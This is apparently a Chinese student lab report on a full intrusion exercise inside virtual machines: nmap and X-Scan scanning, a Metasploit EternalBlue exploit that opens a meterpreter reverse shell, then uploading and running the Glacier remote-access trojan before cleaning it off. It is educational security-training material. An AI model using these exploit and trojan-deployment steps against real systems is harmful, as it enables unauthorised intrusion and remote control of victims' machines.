目录
一、实验目的
利用nmap、X-Scan扫描靶机的漏洞,在Metasploit中用扫描出的永恒之蓝漏洞入侵靶机,建立连接后上传冰河控制靶机,最后用冰河陷阱清除靶机的冰河,记一次完整的入侵控制实验。
二、实验环境
工具软件:VMware、nmap、X-Scan 3.3、Metasploit、冰河、冰河陷阱
实验准备:虚拟机Kali Linux 2022.2、虚拟机Windows server 2008 r2、虚拟机Windows XP
注意:本实验中,Kali为攻击机,XP和08r2为靶机
三、实验内容(实验步骤、测试数据等)
08r2的ip:192.168.63.131
用ping测试08r2与Kali的网络连通性
Kali的ip:192.168.63.132
用ping测试Kali与08r2的网络连通性
第一部分,利用nmap进行扫描
本部分在攻击机Kali中进行,目的为扫描出靶机可能存在的漏洞,为攻击找到突破口
(1)使用nmap扫描目标网络,只进行主机发现,不扫描端口
在攻击机Kali终端中使用nmap工具
命令:nmap -sP 192.168.63.0/24(扫描该网段存活的主机)
观察到该网段存活4台主机
其中192.168.63.131是08r2,192.168.63.132是Kali本身
(2)使用nmap扫描目标操作系统信息、服务版本信息
命令:nmap -nmap -O 192.168.63.131(扫描靶机08r2的操作系统信息、服务版本信息)
或者命令:namp -O 192.168.63.131
(3)使用nmap脚本扫描,找出目标主机ms08-067,ms17-010漏洞
命令:nmap --script=Vuln 192.168.63.131
192.168.63.131为08r2的ip地址,即靶机的ip地址
扫描发现ms17-010漏洞,无ms08-067漏洞
第二部分,利用X-Scan扫描
本部分在靶机08r2中进行,目的为扫描出自身可能存在的漏洞
执行X-Scan,选择菜单栏设置下的菜单项“扫描模块”,确定要扫描主机的IP地址或者IP地址段,选择菜单栏设置下的菜单项“扫描参数”,扫描一共服务器主机,在指定IP范围框中输入IP地址。并勾选部分扫描参数,设置完毕后,进行漏洞扫描,点击工具栏上的绿色图标“开始”,开始对目标主机进行扫描
靶机08r2的ip:192.168.63.131
因为是扫描自身,所以指定IP范围直接指定自身的ip地址即可,当然想要扫描同一网段中其他主机的情况可以在地址簿中添加或者修改范围
设置扫描范围操作截图如下:
设置字典截图如下:
扫描过程截图如下:
扫描结束后,X-Scan会生成一个扫描报告
在报告中具体情况具体分析
X-Scan工具古老,适合初学者体验
现在已经是落后的工具,所以在不同的环境中扫描结果或许会有出入
第三部分,开始入侵
(1)利用smb协议漏洞exploit ms17_010对靶机进行攻击
命令:msfconsole(在Kali中打开渗透测试工具Metasploit)
命令:search ms17-010
发现4个攻击模块
命令:use exploit/windows/smb/ms17_010_eternalblue(或者“use 序号”,即“use 0”)
选择第0个攻击模块
命令:show options
查看RHOSTS(目标主机ip,靶机ip)和LHOST(自身ip,自身ip)的设置情况,如下图:
命令:show payloads
查看载荷,如下图:
命令:set payload payload/windows/x64/meterpreter/reverse_tcp
选择上图序号为16的载荷,不同版本Kali序号不同
命令:set RHOST 192.168.63.131
设置目标主机/靶机ip地址,即08r2的ip地址192.168.63.131
命令:set LHOST 192.168.63.132
设置本地主机/攻击机ip地址,即Kali自身的ip地址192.168.63.132
命令:exploit
开始执行
成功,meterpreter 会话1已打开
第四部分,冰河远程控制
(1)msf建立连接后,利用Meterpreter 命令上传木马到靶机
命令:ps
查看08r2的系统进程
命令:screenshot
拍摄08r2的屏幕截图
命令:run vnc
监控08r2的屏幕
(2)让冰河在靶机中运行
命令:upload /home/kali/Desktop/G_Server.exe C:/
upload 木马存储路径 目标主机存储路径
利用upload把冰河从本地上传到08r2的桌面,即C:/
命令:execute -f C:/G_Server.exe
利用execute命令使冰河在目标主机运行
该命令使冰河G_Server.exe在08r2中运行,打开cmd输入netstat -an,发现7626端口没有被打开(被冰河感染后7626端口会被打开)
不过依然有其他特征表明被感染
特征一:08r2进程列表中名为kernel32.exe的进程正在运行
kernel32.exe是冰河感染后运行在C:\Windows\system32的木马进程
特征二,运行冰河陷阱弹出提示本机被感染
本实验未改动冰河默认感染端口,靶机防火墙是关闭状态,7626端口没有被打开有点奇怪,大概率是08r2的版本问题
为了更好地模拟普遍情况,观察7626端口是否会被打开,本实验后续靶机更换为Windows XP,继“已入侵的情况下”进行实验
切换到XP
双击运行G_Server.exe,使XP感染冰河
双击运行后,系统无明显反应
在终端中查看7626端口是否被打开(7626端口被打开是被冰河感染的征兆)
命令:netstat -an
查看当前端口状态
发现7626端口被打开,XP已被冰河感染
XP的ip:192.168.63.139
切换到Kali
双击运行G_Client.exe(冰河的客户端)
在起始域输入XP的网段
成功搜索到XP的ip:192.168.63.139
成功连接,可以尝试各种远程操作
冰河远程控制界面如下:
(3)靶机使用冰河陷阱清除冰河,并设置蜜罐捕获控制机
四、实验体会
本实验使用nmap和X-Scan扫描出永恒之蓝漏洞,在Metasploit中使用永恒之蓝漏洞入侵靶机,建立连接后用冰河感染靶机,最后用冰河陷阱清除冰河。算是一次排除万难、流程清晰的实操,收获不小,供初学者有参考意义。